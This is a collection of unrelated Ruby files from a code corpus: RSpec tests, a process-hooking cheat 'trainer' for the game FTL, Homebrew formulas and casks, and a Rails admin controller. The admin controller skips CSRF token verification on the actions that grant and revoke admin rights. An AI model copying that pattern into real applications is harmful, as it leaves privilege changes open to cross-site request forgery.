context "when #{status_type} test case do not exist" do
it 'returns nothing' do
is_expected.to be(0)
end
end
end
end
end
| 29.488806 | 120 | 0.680501 |
ffc6267e18e1cf98e9406b1c1827e27c3d2634e0 | 2,451 | #!/usr/bin/env ruby
require 'InterfaceFTL'
require 'sys/proctable'
class TrainerFTL
include InterfaceFTL
def hook
matches = Sys::ProcTable.ps.select{|p| p.comm =~ /^FTL$/ }
abort("No PID") if matches.empty?
pid = matches.first.pid
puts "Attaching to PID: #{pid}"
InterfaceFTL.hook pid
end
def activate
keypress_offset = 0x10013ba18
InterfaceFTL.instance.add_breakpoint(keypress_offset) do |thread|
tilde_keycode = 0x60
home_keycode = 0x116
end_keycode = 0x117
case thread.state.r14
when tilde_keycode
puts "\n\n----- Game Report -----\n"
puts "Player controls #{CrewMemberFactory.player_crew_count} crew members"
puts "Player controls #{CrewMemberFactory.enemy_crew_count} enemy crew members"
crew_members = CrewMemberFactory.crew_list
crew_members.each {|member|
puts "\n----- Member Report -----"
puts "Name: #{member.name}"
puts "Health: #{member.health}"
puts "Provides Vision?: #{member.provides_vision?}"
puts "Species: #{member.species}"
puts "Position: (#{member.position_x}, #{member.position_y})"
puts "World Position: (#{member.world_position_x}, #{member.world_position_y})"
puts "Owner Ship: #{member.owner_ship}"
puts "Boarded Ship: #{member.boarded_ship}"
puts "Room Number: #{member.room_number}"
puts "Room Position: (#{member.room_x}, #{member.room_y})"
puts "Ship Address: #{member.ship_address.to_s(16)}"
}
when home_keycode
puts "\n\nKilling enemies when 'Save Positions' is hit\n\n"
crew_members = CrewMemberFactory.crew_list.select{|member| member.owner_ship != 0}
crew_members.each do |member|
puts "Set to kill #{member.name}"
member.add_kill_trigger(0x1000ff42c)
end
when end_keycode
puts "\n\nKilling everyone on enemy ship...\n\n"
crew_members = CrewMemberFactory.crew_list
crew_members.each do |member|
if member.owner_ship != 0
member.health = 0
end
end
else
puts "Unknown key hit. Code: #{thread.state.r14.to_s(16)}"
end
end
end
def process; InterfaceFTL.process_loop; end
end
trainer = TrainerFTL.new
trainer.hook
trainer.activate
trainer.process | 32.68 | 92 | 0.615667 |
0309aef8d24ef2e54c729f33749670fb72a1ee55 | 1,649 | class Pulumi < Formula
desc "Cloud native development platform"
homepage "https://pulumi.io/"
url "https://github.com/pulumi/pulumi.git",
:tag => "v1.13.0",
:revision => "a09e87a5d0627089bb6a4f624fc60efb49298eb7"
bottle do
cellar :any_skip_relocation
sha256 "e414977bca03f121827db68255a65ee9fc3afb28d022733f897e39d46cac94a6" => :catalina
sha256 "6b5f311b5f15de4c16816ee7c26578acd70fbb37312f3aa9c4492cbf2aa77800" => :mojave
sha256 "0abd410c3bb246e15d931fe722a39bcbe28f82a320fb1d4c83af603d6e8f4081" => :high_sierra
sha256 "a43b11bff1cd3f7ed88dcca3aced6cfcef62e9619c88274aa69c926638504697" => :x86_64_linux
end
depends_on "go" => :build
def install
ENV["GOPATH"] = buildpath
ENV["GO111MODULE"] = "on"
dir = buildpath/"src/github.com/pulumi/pulumi"
dir.install buildpath.children
cd dir do
system "go", "mod", "vendor"
system "make", "dist"
bin.install Dir["#{buildpath}/bin/*"]
prefix.install_metafiles
# Install bash completion
output = Utils.popen_read("#{bin}/pulumi gen-completion bash")
(bash_completion/"pulumi").write output
# Install zsh completion
output = Utils.popen_read("#{bin}/pulumi gen-completion zsh")
(zsh_completion/"_pulumi").write output
end
end
test do
ENV["PULUMI_ACCESS_TOKEN"] = "local://"
ENV["PULUMI_TEMPLATE_PATH"] = testpath/"templates"
system "#{bin}/pulumi", "new", "aws-typescript", "--generate-only",
"--force", "-y"
assert_predicate testpath/"Pulumi.yaml", :exist?, "Project was not created"
end
end
| 33.653061 | 94 | 0.676167 |
11278bcd2f4e8df55e9b8015aa19d418fb6dcef5 | 544 | class Admin::UsersController < ApplicationController
before_action :require_login
before_action :require_admin
skip_before_action :verify_authenticity_token
def index; end
def promote
@user = User.find(params[:user_id])
@user.admin = true
@user.save
redirect_to admin_users_path
end
def demote
@user = User.find(params[:user_id])
@user.admin = false
@user.save
redirect_to admin_users_path
end
private
def require_admin
redirect_to adminonly_path unless current_user.admin?
end
end
| 20.148148 | 57 | 0.737132 |
210ce517d04380a224bdda9c8a43e7fd8d0f32e7 | 282 | # frozen_string_literal: true
module Shore
module Custom
# @see https://github.com/JsonApiClient/json_api_client#custom-paginator
class Paginator < JsonApiClient::Paginating::Paginator
self.page_param = 'number'
self.per_page_param = 'size'
end
end
end
| 23.5 | 76 | 0.72695 |
28e76a77e0107a94d564aae86d744df38aeac192 | 560 | # encoding: UTF-8
# Copyright 2012 Twitter, Inc
# http://www.apache.org/licenses/LICENSE-2.0
require 'spec_helper'
include TwitterCldr::Localized
describe LocalizedHash do
describe "#to_yaml" do
it "should be able to successfully roundtrip the hash" do
hash = { foo: "bar", "string_key" => Object.new }
result = YAML.load(hash.localize.to_yaml)
expect(result).to include(:foo)
expect(result).to include("string_key")
expect(result[:foo]).to eq("bar")
expect(result["string_key"]).to be_a(Object)
end
end
end | 25.454545 | 61 | 0.680357 |
218cec2d8567c449b8a6b6eb31bf8d2175209fb7 | 4,383 | # frozen_string_literal: true
RSpec.describe "Macros #maybe" do
describe "with no args" do
subject(:schema) do
Dry::Schema.define do
required(:email).maybe
end
end
it "generates nil? | filled? rule" do
expect { schema }.to raise_error(ArgumentError)
end
end
describe "with a type spec" do
subject(:schema) do
Dry::Schema.define do
required(:email).maybe(:string, format?: /@/)
end
end
it "generates nil? | str? rule" do
expect(schema.(email: nil)).to be_success
expect(schema.(email: "[email protected]")).to be_success
expect(schema.(email: "jane").errors).to eql(email: ["is in invalid format"])
end
end
describe "with a predicate with args" do
subject(:schema) do
Dry::Schema.define do
required(:name).maybe(min_size?: 3)
end
end
it "generates nil? | (filled? & min_size?) rule" do
expect(schema.(name: nil).messages).to be_empty
expect(schema.(name: "jane").messages).to be_empty
expect(schema.(name: "xy").messages).to eql(
name: ["size cannot be less than 3"]
)
end
end
describe "with a block" do
subject(:schema) do
Dry::Schema.define do
required(:name).maybe { str? & min_size?(3) }
end
end
it "generates nil? | (str? & min_size?) rule" do
expect(schema.(name: nil).messages).to be_empty
expect(schema.(name: "jane").messages).to be_empty
expect(schema.(name: "xy").messages).to eql(
name: ["size cannot be less than 3"]
)
end
end
describe "with an optional key and a block with schema" do
subject(:schema) do
Dry::Schema.define do
optional(:employee).maybe(:hash).maybe(:hash?) do
schema do
required(:id).filled(:string)
end
end
end
end
it "passes when input is valid" do
expect(schema.(employee: {id: "1"})).to be_success
end
it "passes when key is missing" do
expect(schema.({})).to be_success
end
it "passes when value is nil" do
expect(schema.(employee: nil)).to be_success
end
it "fails when value for nested schema is invalid" do
expect(schema.(employee: {id: 1}).messages).to eql(
employee: {id: ["must be a string"]}
)
end
end
describe "with a predicate and a block" do
subject(:schema) do
Dry::Schema.define do
required(:name).maybe(:str?) { min_size?(3) }
end
end
it "generates nil? | (str? & min_size?) rule" do
expect(schema.(name: nil).messages).to be_empty
expect(schema.(name: "jane").messages).to be_empty
expect(schema.(name: "xy").messages).to eql(
name: ["size cannot be less than 3"]
)
end
end
context "with a nested hash" do
subject(:schema) do
Dry::Schema.define do
required(:song).maybe(:hash) do
required(:title).filled
required(:author).filled
end
end
end
it "passes when valid" do
song = {title: "World", author: "Joe"}
expect(schema.(song: song)).to be_success
end
it "fails when not valid" do
song = {title: nil, author: "Jane"}
expect(schema.(song: song).messages).to eql(
song: {title: ["must be filled"]}
)
end
it "passes when nil" do
expect(schema.(song: nil)).to be_success
end
end
context "with a nested schema" do
inner_schema = Dry::Schema.define do
required(:name).filled(:string)
end
schema = Dry::Schema.define do
required(:user).maybe(:hash, inner_schema)
end
it "passes when valid" do
expect(schema.(user: {name: "John"})).to be_success
end
it "fails when not valid" do
expect(schema.(user: {name: 1}).errors.to_h).to eq(user: {name: ["must be a string"]})
end
end
context "with an array with nested schema" do
inner_schema = Dry::Schema.define do
required(:name).filled(:string)
end
schema = Dry::Schema.define do
required(:users).maybe(:array).each(inner_schema)
end
it "passes when valid" do
expect(schema.(users: [{name: "John"}])).to be_success
end
it "fails when not valid" do
expect(schema.(users: [{name: 1}]).errors.to_h).to eq(users: {0 => {name: ["must be a string"]}})
end
end
end
| 24.486034 | 103 | 0.597536 |
ac42b960c59bdc4850245e1066f7aea1b169b72a | 253 | require 'spec_helper'
klass = OneviewSDK::LogicalInterconnectGroup
RSpec.describe klass, integration: true, type: DELETE, sequence: rseq(klass) do
let(:current_client) { $client }
include_examples 'LIGC7000DeleteExample', 'integration context'
end
| 31.625 | 79 | 0.790514 |
5d6f4cca3653538342678ea63abfdceb15fee854 | 1,576 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
require File.expand_path('../shared/slice', __FILE__)
describe "Array#[]" do
it_behaves_like :array_slice, :[]
end
describe "Array.[]" do
it "[] should return a new array populated with the given elements" do
array = Array[1, 'a', nil]
array[0].should == 1
array[1].should == 'a'
array[2].should == nil
end
it "when applied to a literal nested array, unpacks its elements into the containing array" do
Array[1, 2, *[3, 4, 5]].should == [1, 2, 3, 4, 5]
end
it "when applied to a nested referenced array, unpacks its elements into the containing array" do
splatted_array = Array[3, 4, 5]
Array[1, 2, *splatted_array].should == [1, 2, 3, 4, 5]
end
it "can unpack 2 or more nested referenced array" do
splatted_array = Array[3, 4, 5]
splatted_array2 = Array[6, 7, 8]
Array[1, 2, *splatted_array, *splatted_array2].should == [1, 2, 3, 4, 5, 6, 7, 8]
end
it "constructs a nested Hash for tailing key-value pairs" do
Array[1, 2, 3 => 4, 5 => 6].should == [1, 2, { 3 => 4, 5 => 6 }]
end
describe "with a subclass of Array" do
before :each do
ScratchPad.clear
end
it "returns an instance of the subclass" do
ArraySpecs::MyArray[1, 2, 3].should be_an_instance_of(ArraySpecs::MyArray)
end
it "does not call #initialize on the subclass instance" do
ArraySpecs::MyArray[1, 2, 3].should == [1, 2, 3]
ScratchPad.recorded.should be_nil
end
end
end
| 30.901961 | 99 | 0.646574 |
6a9df819f49a7b188496439fe8c9f9c13732f2aa | 159 | FactoryGirl.define do
factory :user do
name "MyString"
email "MyString"
secret "MyString"
token "MyString"
password "MyString"
end
end
| 15.9 | 23 | 0.666667 |
03328b62b38b582da2ab1c7475e19218756da9fe | 800 | Pod::Spec.new do |s|
s.name = 'LN_Framework'
s.version = '1.1.1'
s.osx.deployment_target = "10.9"
s.ios.deployment_target = "8.0"
#s.tvos.deployment_target = "9.0"
s.watchos.deployment_target = "2.0"
s.license= { :type => "MIT", :file => "LICENSE" }
s.summary = '添加了ReactiveObjC.framework库 make by LionNeo'
s.homepage = 'http://git.oschina.net/lionneo'
s.authors = { 'Lion_Neo' => '[email protected]'}
s.description = <<-DESC
更新了ReactiveObjC.framework,集成了ReactiveObjC版本为3.1.0
DESC
s.source = { :git => 'https://github.com/LionNeo/LN_Framework.git', :tag => s.version.to_s }
# s.source_files = 'LN_Framework/*.{framework}'
s.vendored_frameworks = 'LN_Framework/ReactiveObjC.framework'
s.requires_arc = true
end | 33.333333 | 96 | 0.63375 |
ac2c56e6ba6b51cf6227d52541991030abc75fe1 | 236 | require('dynabute/values/base')
require('dynabute/values/boolean_value')
require('dynabute/values/datetime_value')
require('dynabute/values/integer_value')
require('dynabute/values/string_value')
require('dynabute/values/select_value')
| 33.714286 | 41 | 0.822034 |
7933892849f59240cc52bb8c2cb2722b32d8b43e | 3,545 | require 'spec_helper_acceptance'
describe 'Inheritance' do
let(:rights) { 'full' }
let(:user_id_child) { 'roberto' }
let(:target_name) { "inherit_#{perm_type}_on_#{asset_type}" }
let(:target_child_name) { "child_#{asset_type}" }
let(:target_child) { "#{target_parent}/#{target_name}/#{target_child_name}" }
let(:acl_manifest) do
<<-MANIFEST
file { "#{target_parent}":
ensure => directory
}
file { "#{target_parent}/#{target_name}":
ensure => directory,
require => File['#{target_parent}']
}
file { "#{target_child}":
ensure => file,
content => '#{file_content}',
require => File['#{target_parent}/#{target_name}']
}
user { "#{user_id}":
ensure => present,
groups => 'Users',
managehome => true,
password => "L0v3Pupp3t!"
}
user { "#{user_id_child}":
ensure => present,
groups => 'Users',
managehome => true,
password => "L0v3Pupp3t!"
}
acl { "#{target_parent}/#{target_name}":
purge => 'true',
permissions => [
{ identity => '#{user_id}',
rights => ['#{rights}'],
perm_type => '#{perm_type}'
},
{ identity => 'Administrators',
rights => ['full']
}
],
inherit_parent_permissions => 'false'
}
->
acl { "#{target_child}":
permissions => [
{ identity => '#{user_id_child}',
rights => ['#{rights}'],
perm_type => '#{perm_type}'
}
],
inherit_parent_permissions => '#{child_inherit_type}'
}
MANIFEST
end
let(:verify_acl_command) { "icacls #{target_child}" }
let(:verify_content_path) { "c:\\temp\\#{target_name}\\#{target_child_name}" }
context 'Explicit Inheritance of "allow" Parent Permissions for File' do
let(:perm_type) { 'allow' }
let(:asset_type) { 'file' }
let(:child_inherit_type) { 'true' }
let(:file_content) { 'Car repair is expensive' }
let(:acl_regex) { %r{.*\\bob:\(I\)\(F\)} }
windows_agents.each do |agent|
include_examples 'execute manifest and verify file', agent
end
end
context 'Explicit Inheritance of "deny" Parent Permissions for File' do
let(:perm_type) { 'deny' }
let(:asset_type) { 'file' }
let(:child_inherit_type) { 'true' }
let(:file_content) { 'Exploding pants on sale for half off.' }
let(:acl_regex) { %r{.*\\bob:\(I\)\(N\)} }
windows_agents.each do |agent|
include_examples 'execute manifest and verify file', agent
end
end
context 'Remove Inheritance of "allow" Parent Permissions for File' do
let(:perm_type) { 'allow' }
let(:asset_type) { 'file' }
let(:child_inherit_type) { 'false' }
let(:file_content) { 'Smell-o-vision: brought to you by the makers of Taste-o-vision!' }
let(:acl_regex) { %r{.*\\bob:\(F\)} }
windows_agents.each do |agent|
include_examples 'execute manifest and verify file', agent
end
end
context 'Remove Inheritance of "deny" Parent Permissions for File' do
let(:perm_type) { 'deny' }
let(:asset_type) { 'file' }
let(:child_inherit_type) { 'false' }
let(:file_content) { 'She smirked as he disdainfully choked down her tasteless humor.' }
let(:acl_regex) { %r{.*\\bob:\(N\)} }
windows_agents.each do |agent|
include_examples 'execute manifest and verify file', agent
end
end
end
| 30.042373 | 92 | 0.569535 |
036eccaa04c4f12ddd3dc6092b1502490ef8eaa7 | 1,375 | module PgHero
module Methods
module Settings
def names
if server_version_num >= 90500
%i(
max_connections shared_buffers effective_cache_size work_mem
maintenance_work_mem min_wal_size max_wal_size checkpoint_completion_target
wal_buffers default_statistics_target
)
else
%i(
max_connections shared_buffers effective_cache_size work_mem
maintenance_work_mem checkpoint_segments checkpoint_completion_target
wal_buffers default_statistics_target
)
end
end
def settings
fetch_settings(names)
end
def citus_worker_settings
citus_fetch_worker_settings(names)
end
def autovacuum_settings
fetch_settings %i(autovacuum autovacuum_max_workers autovacuum_vacuum_cost_limit autovacuum_vacuum_scale_factor autovacuum_analyze_scale_factor)
end
def vacuum_settings
fetch_settings %i(vacuum_cost_limit)
end
private
def fetch_settings(names)
Hash[names.map { |name| [name, select_one("SHOW #{name}")] }]
end
def citus_fetch_worker_settings(names)
Hash[names.map { |name| [name, select_one("SELECT result FROM run_command_on_workers($cmd$ SHOW #{name} $cmd$) LIMIT 1")] }]
end
end
end
end
| 28.645833 | 152 | 0.669091 |
e8a4247d4eb7b2e96ecc482eee2cd3bd59351337 | 1,378 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Ads
module GoogleAds
module V8
module Services
# Request message for
# {::Google::Ads::GoogleAds::V8::Services::SmartCampaignSearchTermViewService::Client#get_smart_campaign_search_term_view SmartCampaignSearchTermViewService.GetSmartCampaignSearchTermView}.
# @!attribute [rw] resource_name
# @return [::String]
# Required. The resource name of the Smart campaign search term view to fetch.
class GetSmartCampaignSearchTermViewRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
end
end
end
end
| 35.333333 | 199 | 0.711901 |
619efa1420e563fbdf7a862ef2fa648a2dd80802 | 928 | cask "prusaslicer" do
version "2.3.2,202107080658"
sha256 "aca73fee3c1a9fa8143ac2667ac8ba9637b944684a59d3e84fa591e02ffd9c9a"
url "https://github.com/prusa3d/PrusaSlicer/releases/download/version_#{version.before_comma}/PrusaSlicer-#{version.before_comma}+universal-#{version.after_comma}.dmg",
verified: "github.com/prusa3d/PrusaSlicer/"
name "PrusaSlicer"
desc "G-code generator for 3D printers (RepRap, Makerbot, Ultimaker etc.)"
homepage "https://www.prusa3d.com/slic3r-prusa-edition/"
livecheck do
url :url
strategy :github_latest do |page|
match = page.match(%r{href=.*?/PrusaSlicer-(\d+(?:\.\d+)*)\+universal-(\d+)\.dmg}i)
"#{match[1]},#{match[2]}"
end
end
app "PrusaSlicer.app"
zap trash: [
"~/Library/Application Support/PrusaSlicer",
"~/Library/Preferences/com.prusa3d.slic3r",
"~/Library/Saved Application State/com.prusa3d.slic3r.savedState",
]
end
| 34.37037 | 170 | 0.709052 |
33c0f9a541f109f3abf46cefd69858310bbc7ac6 | 4,104 | require 'middleman-core/sitemap/resource'
require 'middleman-core/core_extensions/collections/step_context'
module Middleman
module Sitemap
module Extensions
# Manages the list of proxy configurations and manipulates the sitemap
# to include new resources based on those configurations
class Proxies < ConfigExtension
self.resource_list_manipulator_priority = 0
# Expose `proxy`
expose_to_config :proxy
# Setup a proxy from a path to a target
# @param [String] path The new, proxied path to create
# @param [String] target The existing path that should be proxied to. This must be a real resource, not another proxy.
# @option opts [Boolean] ignore Ignore the target from the sitemap (so only the new, proxy resource ends up in the output)
# @option opts [Symbol, Boolean, String] layout The layout name to use (e.g. `:article`) or `false` to disable layout.
# @option opts [Boolean] directory_indexes Whether or not the `:directory_indexes` extension applies to these paths.
# @option opts [Hash] locals Local variables for the template. These will be available when the template renders.
# @option opts [Hash] data Extra metadata to add to the page. This is the same as frontmatter, though frontmatter will take precedence over metadata defined here. Available via {Resource#data}.
# @return [ProxyDescriptor]
Contract String, String, Maybe[Hash] => RespondTo[:execute_descriptor]
def proxy(path, target, opts={})
ProxyDescriptor.new(
::Middleman::Util.normalize_path(path),
::Middleman::Util.normalize_path(target),
opts.dup
)
end
end
ProxyDescriptor = Struct.new(:path, :target, :metadata) do
def execute_descriptor(app, resources)
md = metadata.dup
should_ignore = md.delete(:ignore)
r = ProxyResource.new(app.sitemap, path, target)
r.add_metadata(
locals: md.delete(:locals) || {},
page: md.delete(:data) || {},
options: md
)
if should_ignore
d = ::Middleman::Sitemap::Extensions::Ignores::IgnoreDescriptor.new(target)
d.execute_descriptor(app, resources)
end
resources + [r]
end
end
end
class Resource
def proxy_to(_path)
throw 'Resource#proxy_to has been removed. Use ProxyResource class instead.'
end
end
class ProxyResource < ::Middleman::Sitemap::Resource
Contract String
attr_reader :target
# Initialize resource with parent store and URL
# @param [Middleman::Sitemap::Store] store
# @param [String] path
# @param [String] target
def initialize(store, path, target)
super(store, path)
target = ::Middleman::Util.normalize_path(target)
raise "You can't proxy #{path} to itself!" if target == path
@target = target
end
# The resource for the page this page is proxied to. Throws an exception
# if there is no resource.
# @return [Sitemap::Resource]
Contract IsA['Middleman::Sitemap::Resource']
def target_resource
resource = @store.find_resource_by_path(@target)
unless resource
raise "Path #{path} proxies to unknown file #{@target}:#{@store.resources.map(&:path)}"
end
if resource.is_a? ProxyResource
raise "You can't proxy #{path} to #{@target} which is itself a proxy."
end
resource
end
Contract IsA['Middleman::SourceFile']
def file_descriptor
target_resource.file_descriptor
end
def metadata
target_resource.metadata.deep_merge super
end
Contract Maybe[String]
def content_type
mime_type = super
return mime_type if mime_type
target_resource.content_type
end
def to_s
"#<#{self.class} path=#{@path} target=#{@target}>"
end
alias inspect to_s
end
end
end
| 34.2 | 201 | 0.637427 |
11308edd66f7c4af25e9f5d9711f61b19a77d685 | 3,515 | require "sqrl/tif"
require "sqrl/cmd/version"
require "httpclient"
module SQRL
class Cmd
private
def create_session(url)
url = upgrade_url(url)
session = ClientSession.new(url, [imk, pimk].compact)
log.debug headline('-', 'Site Keys')
log.debug data_field('imk', imk)
log.debug format_site_key(session.site_key)
if pimk
log.debug data_field('pimk', imk)
log.debug format_site_key(session.previous_site_key)
end
log.debug headline('-')
puts "SFN: \"#{session.server_friendly_name}\"\n"
session
end
SqrlHeaders = {'Content-Type' => 'application/x-www-form-urlencoded'}
SqrlRequest = {
:agent_name => "SQRL/1 SQRL::Cmd/#{SqrlCmd::VERSION}",
:default_header => SqrlHeaders,
}
def verbose_request(server_string, session = nil, retries = 1)
session ||= create_session(server_string)
req = QueryGenerator.new(session, session.server_string)
req.opt(*opt)
req = yield req if block_given?
log.info format_params(req.client_data, 'Client Data')
log.debug data_field("Client String", req.client_string)
log.debug format_params(req.to_hash, 'Query')
log.info headline('-', 'Request')
log.info "POST #{req.post_path}"
log.debug req.post_body
log.debug ""
h = HTTPClient.new(SqrlRequest)
h.ssl_config.verify_mode = OpenSSL::SSL::VERIFY_NONE unless verify_cert?
res = h.post(req.post_path, req.post_body)
log.info "Response: #{res.status}"
log.debug res.body
log.info headline('-')
log.info ""
parsed = ResponseParser.new(res.body).update_session(session)
parsed.tif_base = tif_base
log.info format_params(parsed.params, 'Response')
if parsed.transient_error? && retries > 0
standard_display(parsed) if log.level <= Logger::INFO
puts "Transient error, retrying"
verbose_request(session.server_string, session, retries - 1)
else
parsed
end
rescue Errno::ECONNREFUSED => e
log.error e.message
session.server_string = server_string
ResponseParser.new({'exception' => e})
end
def print_tif(tif)
print_table SQRL::TIF.map {|bit, flag|
if (tif & bit) != 0
[bit.to_s(16), flag.to_s.upcase]
else
[' ', flag]
end
}
end
def standard_display(parsed)
print_tif(parsed.tif)
puts [parsed.ask.message, parsed.params['sfn']].compact.join(' -- ')
end
def open_browser(url)
case RbConfig::CONFIG['host_os']
when /mswin|mingw|cygwin/; system "start #{url}"
when /darwin/; system "open #{url}"
when /linux|bsd/; system "xdg-open #{url}"
else puts url
end
end
def headline(h = '-', s = nil)
if s
l = 76 - s.length
[h*(l/2), s, h*((l+1)/2)].join(' ')
else
h*78
end
end
def data_field(key, value)
"%10s : %s" % [key, value]
end
def format_params(params, title = nil)
[
headline('-', title),
params.map {|key, value|
data_field(key, value)
},
headline('-'),
"",
].flatten.join("\n")
end
def format_site_key(site_key)
[
data_field('private', Base64.encode(site_key.instance_variable_get('@private_key').to_bytes)),
data_field('public', Base64.encode(site_key.public_key)),
].join("\n")
end
end
end
| 28.346774 | 102 | 0.598293 |
795fccfc0ac8a7f028bb295c529eb2593b34aed9 | 3,268 | # We have keys with this semantical meaning:
#
# 1.1.1.1 \
# 1.1.2.1 3.1
# 1.1.1.2 / \ /
# 2.1
# / \
# 1.2.1.1 - 1.2.2.1 3.2
#
# In other words:
#
# 1.1.1.1 start 1.1.1.1, 1.1.1.2, and 1.2.1.1 in parallel
# 1.1.1.2
# 1.1.2.1 start once 1.1.1.1 and 1.1.1.2 have completed
# 1.2.1.1
# 1.2.2.1 start once 1.2.1.1 has completed
# 2 start once 1.1.2.1 and 1.2.2.1 have completed
# 3.1 start 3.1 and 3.2 once 2 has completed
# 3.2
#
# We transform this into a tree structure like the following, dropping: all
# jobs that are not in a startable state (i.e. `created`).
#
# 1
# 1.1
# 1.1.1
# 1.1.1.1
# 1.1.1.2
# 1.2
# 1.2.1
# 1.2.1.1
# 1.2.2
# 1.2.2.1
# 2
# 2.1
# 3
# 3.1
# 3.2
#
# Then, in order to determine startable jobs we can:
#
# * Select the first branch
# * From this branch select all first branches (1.1.1 and 1.2.1)
# * From these branches select all leafs
#
# This mechanism doesn't seem overly generic, but I cannot come up with any other
# way that would not
#
# * either not select 1.2.1.1 as startable (when all jobs are :created)
# * or not exclude 1.2.2.1 from being startable
#
# If anyone can come up with a more generic mechanism then I'd be extremely
# happy to hear it :)
module Travis
module Stages
def self.build(jobs)
jobs.inject(Stage.new(nil, 0)) do |stage, job|
job = Job.new(*job.values_at(:id, :state, :stage))
stage << job unless job.finished?
stage
end
end
class Stage
attr_reader :parent, :num, :children
def initialize(parent, num)
@parent = parent
@num = num.to_i
@children = []
parent.children << self if parent
end
def <<(job)
node = job.leaf? ? children : stage(job.nums.shift)
node << job
end
def startable
if first.is_a?(Stage)
first.children.map(&:startable).flatten
else
children.select(&:startable?).map(&:to_h)
end
end
def root?
key == '0'
end
def key
[parent && parent.key != '0' ? parent.key : nil, num].compact.join('.')
end
def inspect
indent = ->(child) { child.inspect.split("\n").map { |str| " #{str}" }.join("\n") }
"#{root? ? 'Root' : "Stage key=#{key}"}\n#{children.map(&indent).join("\n")}"
end
private
def stage(num)
stages.detect { |stage| stage.num == num } || Stage.new(self, num.to_i)
end
def stages
children.select { |child| child.is_a?(Stage) }
end
def first
children.first
end
end
class Job < Struct.new(:id, :state, :key)
def leaf?
nums.size == 1
end
def nums
@nums ||= key.split('.').map(&:to_i)
end
def startable
startable? ? [self] : []
end
def startable?
state && state.to_sym == :created
end
def finished?
state && state.to_sym == :finished
end
def inspect
"Job key=#{key} state=#{state}"
end
end
end
end
| 22.853147 | 92 | 0.518054 |
01aa883d56dd2ad50036a9e493c4bd793b206090 | 1,855 | require_relative '../spec_helper'
require_relative '../../lib/rapid-vaults/generate'
describe Generate do
context '.openssl' do
after(:all) do
%w[key.txt nonce.txt].each { |file| File.delete(file) }
end
it 'generates the key and nonce files from the cli' do
Generate.openssl(ui: :cli)
expect(File.file?('key.txt')).to be true
expect(File.file?('nonce.txt')).to be true
expect(File.read('key.txt')).to be_a(String)
expect(File.read('nonce.txt')).to be_a(String)
end
it 'outputs an array with the key and nonce from the api' do
generate = Generate.openssl(ui: :api)
expect(generate).to be_a(Array)
expect(generate[0]).to be_a(String)
expect(generate[1]).to be_a(String)
expect(generate.length).to eq(2)
end
end
context '.gpgme' do
it 'raises an error for a missing GNUPGHOME variable' do
expect { Generate.gpgme(gpgparams: File.read("#{fixtures_dir}/gpgparams.txt")) }.to raise_error('Environment variable "GNUPGHOME" was not set.')
end
# travis ci cannot support non-interactive gpg
unless File.directory?('/home/travis')
it 'generates the key files' do
require 'fileutils'
ENV['GNUPGHOME'] = fixtures_dir
Generate.gpgme(gpgparams: File.read("#{fixtures_dir}/gpgparams.txt"))
%w[trustdb.gpg pubring.kbx pubring.kbx~].each do |file|
expect(File.file?("#{fixtures_dir}/#{file}")).to be true
File.delete("#{fixtures_dir}/#{file}")
end
%w[openpgp-revocs.d private-keys-v1.d].each do |dir|
expect(File.directory?("#{fixtures_dir}/#{dir}")).to be true
FileUtils.rm_r("#{fixtures_dir}/#{dir}")
end
%w[S.gpg-agent random_seed].each { |file| File.delete("#{fixtures_dir}/#{file}") if File.exist?(file) }
end
end
end
end
| 36.372549 | 150 | 0.636119 |
2600f265df15011770bf1c5b74ea62c56c6c02ad | 1,003 | class Jhiccup < Formula
desc "Measure pauses and stalls of an app's Java runtime platform"
homepage "https://www.azul.com/jhiccup/"
url "https://www.azul.com/files/jHiccup-2.0.10-dist.zip"
sha256 "7bb1145d211d140b4f81184df7eb9cea90f56720ad7504fac43c0c398f38a7d8"
livecheck do
url :homepage
regex(/href=.*?jHiccup[._-]v?(\d+(?:\.\d+)+)-dist\.zip/i)
end
bottle :unneeded
def install
bin.install "jHiccup", "jHiccupLogProcessor"
# Simple script to create and open a new plotter spreadsheet
(bin+"jHiccupPlotter").write <<~EOS
#!/bin/sh
TMPFILE="/tmp/jHiccupPlotter.$$.xls"
cp "#{prefix}/jHiccupPlotter.xls" $TMPFILE
open $TMPFILE
EOS
prefix.install "jHiccup.jar"
prefix.install "jHiccupPlotter.xls"
inreplace "#{bin}/jHiccup" do |s|
s.gsub! /^JHICCUP_JAR_FILE=.*$/,
"JHICCUP_JAR_FILE=#{prefix}/jHiccup.jar"
end
end
test do
assert_match "CSV", shell_output("#{bin}/jHiccup -h", 255)
end
end
| 27.108108 | 75 | 0.663011 |
ab8229dbae1b7339505478d93bc278819f6be903 | 6,870 | require "cases/migration/helper"
module ActiveRecord
class Migration
class ColumnAttributesTest < ActiveRecord::TestCase
include ActiveRecord::Migration::TestHelper
self.use_transactional_tests = false
def test_add_column_newline_default
string = "foo\nbar"
add_column "test_models", "command", :string, default: string
TestModel.reset_column_information
assert_equal string, TestModel.new.command
end
def test_add_remove_single_field_using_string_arguments
assert_no_column TestModel, :last_name
add_column "test_models", "last_name", :string
assert_column TestModel, :last_name
remove_column "test_models", "last_name"
assert_no_column TestModel, :last_name
end
def test_add_remove_single_field_using_symbol_arguments
assert_no_column TestModel, :last_name
add_column :test_models, :last_name, :string
assert_column TestModel, :last_name
remove_column :test_models, :last_name
assert_no_column TestModel, :last_name
end
def test_add_column_without_limit
# TODO: limit: nil should work with all adapters.
skip "MySQL wrongly enforces a limit of 255" if current_adapter?(:Mysql2Adapter)
add_column :test_models, :description, :string, limit: nil
TestModel.reset_column_information
assert_nil TestModel.columns_hash["description"].limit
end
if current_adapter?(:Mysql2Adapter)
def test_unabstracted_database_dependent_types
add_column :test_models, :intelligence_quotient, :tinyint
TestModel.reset_column_information
assert_match(/tinyint/, TestModel.columns_hash["intelligence_quotient"].sql_type)
end
end
unless current_adapter?(:SQLite3Adapter)
# We specifically do a manual INSERT here, and then test only the SELECT
# functionality. This allows us to more easily catch INSERT being broken,
# but SELECT actually working fine.
